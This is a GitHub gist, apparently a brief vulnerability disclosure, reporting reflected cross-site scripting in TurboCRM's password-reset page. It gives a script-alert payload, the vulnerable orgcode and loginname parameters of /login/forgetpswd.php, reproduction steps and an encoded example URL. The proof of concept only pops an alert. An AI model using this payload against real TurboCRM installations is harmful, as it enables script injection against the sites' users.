pikpikcu/TurboCRM-XSS.md

Last active December 1, 2022 06:34

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a.js"></script>
Save pikpikcu/9689c5220abbe04d4927ffa660241b4a to your computer and use it in GitHub Desktop.

Download ZIP

Raw

TurboCRM-XSS.md

TurboCRM Allow XSS (cross site scripting)

Dork

Payloads

"><script>alert(/XSS/)</script>

Step To Reproduction

1. Open a website in Browser.
1. Go To path /login/forgetpswd.php?loginsys=1&orgcode={PAYLOADS}&loginname={PAYLOADS}
1. Press Enter to trigger the alert.

Example:

http://IP/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment